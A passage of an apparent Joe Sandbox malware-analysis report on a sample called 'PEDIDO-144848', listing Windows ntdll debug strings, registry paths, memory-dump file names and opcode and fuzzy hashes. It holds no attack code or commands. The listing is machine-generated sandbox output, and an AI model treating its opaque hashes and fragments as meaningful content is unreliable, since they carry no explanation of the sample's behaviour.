                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 36C77F8C, 36C78000
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 36C3C5E3
                                                        • LdrpInitializeImportRedirection, xrefs: 36C77F82, 36C77FF6
                                                        • Loading import redirection DLL: '%wZ', xrefs: 36C77F7B
                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 36C77FF0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 0-475462383
                                                        • Opcode ID: dac531971fe4a584478cd177abe77d558181c9a0279d7f6e44734d6611300e73
                                                        • Instruction ID: c96f832b431b6a86cd4a255509e01d9b7b8af323ff35d7a5dc9f09491f001a5d
                                                        • Opcode Fuzzy Hash: dac531971fe4a584478cd177abe77d558181c9a0279d7f6e44734d6611300e73
                                                        • Instruction Fuzzy Hash: 57312671609B419FC214EF28DC45E2EBBD5EF84B50F010958FA84AB391EB24DC04CBA3
                                                        Strings
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 36C71F82
                                                        • SXS: %s() passed the empty activation context, xrefs: 36C71F6F
                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 36C71FA9
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 36C71F8A
                                                        • RtlGetAssemblyStorageRoot, xrefs: 36C71F6A, 36C71FA4, 36C71FC4
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 36C71FC9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                        • API String ID: 0-861424205
                                                        • Opcode ID: 6378bbcf578ce7ec1d5d89ffb6a6c936327acadf0fefec34f759953dbc1dc2ab
                                                        • Instruction ID: 03fcc0808b600390db162fa507dc6d2be125681d53be92d27ad2227b84e54e62
                                                        • Opcode Fuzzy Hash: 6378bbcf578ce7ec1d5d89ffb6a6c936327acadf0fefec34f759953dbc1dc2ab
                                                        • Instruction Fuzzy Hash: 5D31E276E01224BFFB218A97AC44F5B7E68AF55694F2440A9F900A7240D738EA00CBE5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-4253913091
                                                        • Opcode ID: a075589ae54c05093fd15fe755168bd4b891bce520d592eab12c34ee85ade968
                                                        • Instruction ID: bb9ac1703b579446f28ae801a822a8a5262f8e04f38a376031c1e97df40989d0
                                                        • Opcode Fuzzy Hash: a075589ae54c05093fd15fe755168bd4b891bce520d592eab12c34ee85ade968
                                                        • Instruction Fuzzy Hash: DAF1AB74B00605DFEB05CF6AC890BAAB7B5FF44348F2481A9E415DB381DB34E981DBA1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                        • API String ID: 3446177414-2283098728
                                                        • Opcode ID: 58ce0d28266f19ad0966da3472fde19945a939774de756e5b8009cd06d100322
                                                        • Instruction ID: 01f40eb579a4f56386e50c5cc18d719d18e55ae90ccd23debcbf27831cba880e
                                                        • Opcode Fuzzy Hash: 58ce0d28266f19ad0966da3472fde19945a939774de756e5b8009cd06d100322
                                                        • Instruction Fuzzy Hash: AB510E75A00B019FEB10EF2BCC84B19F7A1BF84714F18062EE955DB291EB35E851CB92
                                                        APIs
                                                        Strings
                                                        • Failed to reallocate the system dirs string !, xrefs: 36C780E2
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 36C780F3
                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 36C780E9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-1783798831
                                                        • Opcode ID: 3e2f4759ce3dbfaa45105e6ab41cbe651cd6ad26ec353bbb4575d1ae061e952f
                                                        • Instruction ID: 32169b2d1e940d6036f25b1eb6b80b90ddcde802c61838552a56cce0663ebe46
                                                        • Opcode Fuzzy Hash: 3e2f4759ce3dbfaa45105e6ab41cbe651cd6ad26ec353bbb4575d1ae061e952f
                                                        • Instruction Fuzzy Hash: FC41F3B5A15740ABD710DB25CC44F5B7BF9EF85650F10482EFA98EB250EB38D801CB96
                                                        APIs
                                                        Strings
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 36C84519
                                                        • LdrpCheckRedirection, xrefs: 36C8450F
                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 36C84508
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 3446177414-3154609507
                                                        • Opcode ID: 0511e8d357fcda7e4c0bfa996e5e31ca9713547cec1a5522abbaaef9e981fbb4
                                                        • Instruction ID: e23ddf3c7a2c4c05812205e5dbe08601c795c15e9ce22b827aef8df3d40c9077
                                                        • Opcode Fuzzy Hash: 0511e8d357fcda7e4c0bfa996e5e31ca9713547cec1a5522abbaaef9e981fbb4
                                                        • Instruction Fuzzy Hash: FB41D476A047219FDB20CF59C840A9677E5EFC8798F06865DED58DB352E730E800CBA1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                        • API String ID: 0-3061284088
                                                        APIs
                                                        Strings
                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36C00586
                                                        • kLsE, xrefs: 36C005FE
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                        • API String ID: 3446177414-2547482624
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                        • API String ID: 0-379654539
                                                        Strings
                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 36C3847E
                                                        • LdrpInitializeProcess, xrefs: 36C38342
                                                        • @, xrefs: 36C384B1
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 36C38341
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-1918872054
                                                        Strings
                                                        • SXS: %s() passed the empty activation context, xrefs: 36C71FE8
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 36C720C0
                                                        • .Local, xrefs: 36C327F8
                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 36C71FE3, 36C720BB
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                        • API String ID: 0-1239276146
                                                        Strings
                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 36C60E2F
                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 36C60DEC
                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 36C60E72
                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 36C60EB5
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                        • API String ID: 0-1468400865
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                        • API String ID: 0-2586055223
                                                        Strings
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                        • API String ID: 2994545307-1391187441
                                                        APIs
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                        • API String ID: 0-1168191160
                                                        Strings
                                                        • HEAP: , xrefs: 36C014B6
                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36C01648
                                                        • HEAP[%wZ]: , xrefs: 36C01632
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-3178619729
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 36C70128
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 36C700F1
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 36C700C7
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                        • API String ID: 0-1145731471
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                        • API String ID: 0-2391371766
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                        • API String ID: 0-318774311
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                        • API String ID: 0-373624363
                                                        Strings
                                                        • GlobalizationUserSettings, xrefs: 36CDB3B4
                                                        • TargetNtPath, xrefs: 36CDB3AF
                                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 36CDB3AA
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                        • API String ID: 0-505981995
                                                        Strings
                                                        • HEAP: , xrefs: 36C5E442
                                                        • HEAP[%wZ]: , xrefs: 36C5E435
                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 36C5E455
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                        • API String ID: 0-1340214556
                                                        Strings
                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 36C6A396
                                                        • LdrpCompleteMapModule, xrefs: 36C6A39D
                                                        • minkernel\ntdll\ldrmap.c, xrefs: 36C6A3A7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                        • API String ID: 0-1676968949
                                                        Strings
                                                        • HEAP: , xrefs: 36CAD79F
                                                        • HEAP[%wZ]: , xrefs: 36CAD792
                                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 36CAD7B2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                        • API String ID: 0-3815128232
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                        • API String ID: 0-1151232445
                                                        Strings
                                                        • LdrpAllocateTls, xrefs: 36C7194A
                                                        • minkernel\ntdll\ldrtls.c, xrefs: 36C71954
                                                        • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36C71943
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                        • API String ID: 0-4274184382
                                                        Strings
                                                        • Actx , xrefs: 36C332CC
                                                        • SXS: %s() passed the empty activation context data, xrefs: 36C72808
                                                        • RtlCreateActivationContext, xrefs: 36C72803
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                        • API String ID: 0-859632880
                                                        Strings
                                                        • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 36C8B2B2
                                                        • @, xrefs: 36C8B2F0
                                                        • GlobalFlag, xrefs: 36C8B30F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                        • API String ID: 0-4192008846
                                                        Strings
                                                        • DLL "%wZ" has TLS information at %p, xrefs: 36C7184A
                                                        • minkernel\ntdll\ldrtls.c, xrefs: 36C7185B
                                                        • LdrpInitializeTls, xrefs: 36C71851
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                        • API String ID: 0-931879808
                                                        Strings
                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 36C885DE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                        • API String ID: 0-702105204
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@
                                                        • API String ID: 0-149943524
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Legacy$UEFI
                                                        • API String ID: 2994545307-634100481
                                                        Strings
                                                        • RedirectedKey, xrefs: 36CDB60E
                                                        • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 36CDB5C4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                        • API String ID: 0-1388552009
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$$
                                                        • API String ID: 3446177414-233714265
                                                        Strings
                                                        • RtlpInitializeAssemblyStorageMap, xrefs: 36C7289A
                                                        • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 36C7289F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                        • API String ID: 0-2653619699
                                                        Strings
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Cleanup Group$Threadpool!
                                                        • API String ID: 2994545307-4008356553
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: MUI
                                                        • API String ID: 0-1339004836
                                                        APIs
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570794095.0000000036900000.00000040.00001000.00020000.00000000.sdmp, Offset: 36900000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36900000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6'
                                                        • API String ID: 0-3584366525
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: GlobalTags
                                                        • API String ID: 0-1106856819
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #%u
                                                        • API String ID: 0-232158463
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: EXT-
                                                        • API String ID: 0-1948896318
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryHash
                                                        • API String ID: 0-2202222882
                                                        Similarity
                                                        • API ID:
                                                        • String ID: verifier.dll
                                                        • API String ID: 0-3265496382
